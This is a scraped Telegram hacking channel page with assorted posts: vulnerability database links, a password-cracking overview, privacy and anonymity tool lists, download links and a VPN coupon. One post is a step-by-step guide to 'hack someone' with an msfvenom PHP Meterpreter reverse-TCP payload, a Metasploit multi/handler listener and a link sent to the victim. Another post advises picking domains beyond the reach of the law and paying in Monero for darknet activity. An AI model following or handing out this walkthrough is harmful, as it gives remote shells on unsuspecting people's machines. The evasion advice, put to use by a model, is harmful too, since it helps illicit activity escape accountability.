GeekCode
794 subscribers
452 photos
3 videos
7 files
942 links
🍁Cyber Security ❤️
🍁Hacking Resources 👨‍💻

Providing knowledge to people's🥀
Nobody gets smaller by sharing knowledge
You can also share your knowledge with us...🙂🙂

📰Promotion/Query - @geekcodevipbot
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Hey guys Geek-Code is Here ♥️

Road to 1.6k 🙏

Only 20 subscribers left to achieve at 1.6k😍

#share us for Care us #supportus

@geekcode 📍
🔰 Vulnerability Database And Resources For Free 🔰

Vulnerability Database are the first place to start your day as a security professional. Any new vulnerability detection is generally available through public vulnerability database. These database are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability. Some Public Sources for you -

⚡️http://www.exploit-db.com/

⚡️http://securityvulns.com/

⚡️http://www.securityfocus.com/

⚡️http://www.securiteam.com/

⚡️http://secunia.com/advisories/

⚡️http://insecure.org/sploits_all.html

⚡️http://zerodayinitiative.com/advisories/published/

⚡️http://nmrc.org/pub/index.html

⚡️http://web.nvd.nist.gov

⚡️http://cvedetails.com/

⚡️http://www.rapid7.com/vulndb/index.jsp

⚡️http://oval.mitre.org

#share us for Care us #supportus

@geekcode 📍
This media is not supported in your browser
VIEW IN TELEGRAM
🔰HOW TO HACK SOMEONE USING A PHP~PAYLOAD🔰

💖sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴘᴀʏʟᴏᴀᴅs ᴡɪᴛʜ ᴘʜᴘ ᴜsɪɴɢ ᴍsғᴠᴇᴍᴏɴ

💖ᴡʜᴀᴛ ɪs ᴍsғᴠᴇᴍᴏɴ?? ᴡᴇʟʟ ᴍᴇᴛᴀsᴘʟᴏɪᴛ ғʀᴀᴍᴇᴡᴏʀᴋ ᴠᴇɴᴏᴍ ɪs ᴀ ᴘᴀʏʟᴏᴀᴅ ɢᴇɴ ᴜsᴇᴅ ᴏɴ ʟɪɴᴜɴx ᴛᴏ ɢᴇɴᴇʀᴀᴛᴇ ᴘᴀʏʟᴏᴀᴅs ғᴏʀ ᴇxᴘʟᴏɪᴛᴀᴛɪᴏɴ

💖ʟᴇᴛs sᴛᴀʀᴛ ʙʏ sᴛᴀʀᴛɪɴɢ ᴀᴘᴀᴄʜᴇ2 sᴏ ᴏᴘᴇɴ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ

ᴄᴏᴅᴇ:
–––––––––––––––––––
sᴇʀᴠɪᴄᴇ ᴀᴘᴀᴄʜᴇ2 sᴛᴀʀᴛ


🌀sᴛᴇᴘ 1:
ɴᴏᴡ ᴡᴇ ɴᴇᴇᴅ ᴏᴜʀ ʟᴏᴄᴀʟ ɪᴘ ᴏʀ ᴇxᴛᴇʀɴᴀʟ ɪᴘ ғᴏʀ ʟᴏᴄᴀʟ ɪᴘ ᴇɴᴛᴇʀ

ᴄᴏᴅᴇ:
–––––––––––––––––––
ɪғᴄᴏɴғɪɢ
ᴀɴᴅ ғᴏʀ ᴇxᴛᴇʀɴᴀʟ ɢᴏᴏɢʟᴇ ᴡʜᴀᴛs ᴍʏ ɪᴘ
ɴᴏᴛᴇ ɪғ ᴜsɪɴɢ ᴇxᴛᴇʀɴᴀʟ ʟɪɴᴋ ᴜ ɴᴇᴇᴅ ᴛᴏ ғᴏʀᴡᴀʀᴅ ᴛʜᴇ ᴘᴏʀᴛs ᴏɴ ʏᴏᴜʀ ʀᴏᴜᴛᴇʀ

🌀sᴛᴇᴘ 2:
ɴᴏᴡ ʏᴏᴜ ʜᴀᴠᴇ ᴛʜᴇ ʟᴏᴄᴀʟ ɪᴘ, sᴏ ʟᴇᴛs ᴍᴀᴋᴇ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ
ᴇɴᴛᴇʀ ᴛʜɪs ᴄᴏᴍᴍᴀɴᴅ:

ᴄᴏᴅᴇ:
–––––––––––––––––––
ᴍsғᴠᴇɴᴏᴍ -ᴘ ᴘʜᴘ/ᴍᴇᴛᴇʀᴘʀᴇᴛᴇʀ/ʀᴇᴠᴇʀsᴇ_ᴛᴄᴘ ʟʜᴏsᴛ= 192.168.8.107 ʟᴘᴏʀᴛ=4444 -ᴇ ᴘʜᴘ/ʙᴀsᴇ64 -ғ ʀᴀᴡ > /ʀᴏᴏᴛ/ᴅᴇsᴋᴛᴏᴘ/ʜᴏᴍᴇ.ᴘʜᴘ

🌀sᴛᴇᴘ 3:
ɴᴏᴡ ɢᴏ ᴛᴏ ᴛʜᴇ ᴅᴇsᴋᴛᴏᴘ ᴀɴᴅ ᴄᴏᴘʏ ᴛʜᴇ ᴘᴀʏʟᴏᴀᴅ ᴛᴏ ʏᴏᴜʀ ʜᴛᴍʟ ғɪʟᴇ ɪɴ /ᴠᴀʀ/ᴡᴡ ᴡ/ʜᴛᴍʟ ғᴏʟᴅᴇʀ
ʀᴇᴍᴏᴠᴇ ᴛʜᴇ sᴘᴀᴄᴇ ^^

🌀sᴛᴇᴘ 4:
ɴᴏᴡ ᴏᴘᴇɴ ᴀ ɴᴇᴡ ᴛᴇʀᴍɪɴᴀʟ ᴀɴᴅ ᴛʏᴘᴇ

ᴄᴏᴅᴇ:
–––––––––––––––––––
MSFCONSOL

🌀sᴛᴇᴘ 5:
TYPE BELOW COMMAND'S

ᴄᴏᴅᴇ:
–––––––––––––––––––
USE EXPLOIT/MULTI/HANDLER

ᴄᴏᴅᴇ:
–––––––––––––––––––
SET PAYLOAD PHP/METERPRETER/REVERSE_TCP

ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LHOST [YOUR LOCAL IP]

ᴄᴏᴅᴇ:
–––––––––––––––––––
SET LPORT 4444

ᴄᴏᴅᴇ:
–––––––––––––––––––
EXPLOIT

🌀sᴛᴇᴘ 6:
ɴᴏᴡ sᴇɴᴅ ᴛʜᴇ ᴠɪᴄᴛᴜᴍ ᴛʜᴇ ʟɪɴᴋ 192.168.8.107:4444/Home.php

🌀sᴛᴇᴘ 7:
ɴᴏᴡ ᴛʏᴘᴇ ʜᴇʟᴘ ᴀɴᴅ ʏᴏᴜ ɢᴇᴛ ᴀ ғᴜʟʟ ʟɪsᴛ ᴄᴏᴍᴍᴀɴᴅs ʏᴏᴜ ᴄᴀɴ ʀᴜɴ ᴜɴᴅᴇʀ ᴍᴇᴛᴀsᴘʟᴏɪᴛ

#share & #supportus

---------------------> @geekcode 📍

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
Ethical Hacking and Countermeasures

• Password cracking
• Password attacks
• Identifying various password cracking tools
• Formulating countermeasures for password cracking
• Escalating privileges
• Executing applications
• Keyloggers and Spywares
• Spywares and keyloggers countermeasures
• Hiding files
• Understanding rootkits
• The use of Steganography
• Covering tracks

https://anonfiles.com/10T3G4jbp7/System_Hacking_pdf

"Get all the ideas about system hacking."

#share & #supportus

----------------> @geekcode 📍

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
🔰Password cracking techniques🔰

There are a number of techniques that can be used to crack passwords. We will describe the most commonly used ones below ;

🌀Dictionary attack –
This method involves the use of a wordlist to compare against user passwords.

🌀Brute force attack – This method is similar to the dictionary attack. Brute force attacks use algorithms that combine alpha-numeric characters and symbols to come up with passwords for the attack. For example, a password of the value “password” can also be tried as p@$$word using the brute force attack.

🌀Rainbow table attack – This method uses pre-computed hashes. Let’s assume that we have a database which stores passwords as md5 hashes. We can create another database that has md5 hashes of commonly used passwords. We can then compare the password hash we have against the stored hashes in the database. If a match is found, then we have the password.

🌀Guess – As the name suggests, this method involves guessing. Passwords such as qwerty, password, admin, etc. are commonly used or set as default passwords. If they have not been changed or if the user is careless when selecting passwords, then they can be easily compromised.

🌀Spidering – Most organizations use passwords that contain company information. This information can be found on company websites, social media such as facebook, twitter, etc. Spidering gathers information from these sources to come up with word lists. The word list is then used to perform dictionary and brute force attacks.

#share & #supportus

----------------> @geekcode 📍

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🔰PDF GUIDE FOR TRACING IP, DNS, WHOIS NSLOOKUP 🔰

Tracing an IP, getting Geographical Information using an IP, IP Address, nslookup, Reverse DNS, WHOIS, tracert, traceroute.

📥 Download PDF Guide -
www.up-4ever.org/5ozey3kzttn6

In this guide you will learn basics to advance about ip tracing, getting geographicl information, and much more.

#share & #supportus

----------------> @geekcode 📍

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🔰 KeepSolid Premium VPN For 6 Months 🔰

Redeem Code in Old Account if you Already Have, Date will get Extended till 2022.

This VPN is Available for All Devices.
Create an Account here :
https://my.keepsolid.com/signup/

Sign in & Click on Redeem
Apply The Coupon

CODE : VPNUNLIMITED2020CHIP

#share & #supportus

----------------> @geekcode 📍

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 Best Tools to protect your online privacy these days 🔥

Privacy should be the top priority of anyone doing their business online, especially on Telegram , Darknet

Most of you may know many of the tools mentioned in this post but I feel compiling a good list never hurts

Step 1 - VPN

Staying anonymous should be a second nature to everyone online. You can use free/paid software for that.
One should look for a VPN that does not keep logs and even the country they are based from is also know for pro-privacy rules.

Top free software:

TOR/TAILS
Your own proxy/vpn setup using linux scripts and VPS
Top paid VPN software:

iPredator (Sweden)
Mullvad (Sweden)
ProtonVPN (Switzerland)
ExpressVPN (British Virgin Islands)
NordVPN (Panama) - LQ but adding it

Step 2 - Emails

Use email providers that protect user privacy and also have encryption methods implemented in their mail system.
You can use any of the above emails to register on forums, buy subscriptions and even for personal use irl to protect your privacy:


Protonmail.com
Tutanota.com
Yandex.com
Posteo.de
Mailfence
Hushmail

Step 3 - Payments

Always try to use cryptocurrencies for payments, as much as you can. One should even consider using XMR (Monero) as it is completely anonymous and there is no public track on its blockchain. Howeven, If you use standard crypto, make sure you use a desktop version wallet and have taken a privacy steps first so you actually use it without exposing your real IP.

Step 4 - Purchasing Domains / Hosting

Njal.la is your best bet for domain registry. They use their own information to register the domain name for you. Fees are high, but worth every single cent when you view at this at the long term .


Best domain extensions for privacy:

Avoid using .com / .net / .org etc common domain extensions. Always try to use domain extensions from islands nations that are not covered by most digital worldwide laws.
Some examples include .is, .gd, .la
More info on domain extensions can be found on wikipedia here

Additional Pointers

1) Always get WHOIS privacy even if you'll have to pay extra for it

2) Use a sandbox / rdp to test any program and always scan (can use virustotal) and keep your system clean of malwares. Malwarebytes is a must and keys are not that expensive

3) It never hurts to use Virustotal to scan any programs etc for all kinds of stuff people jack in them

share & #supportus

----------------> @geekcode 📍

Share as more as 😍
This media is not supported in your browser
VIEW IN TELEGRAM
Fundamentals of Network Security

FREE For 48 Hrs

Concept on network Security, OSI model, Network Attack and protection.


ENROLL NOW -:

https://geekcode.com/network-fundamentals

#share & #supportus

------------------> @geekcode📍

Share as more as 😍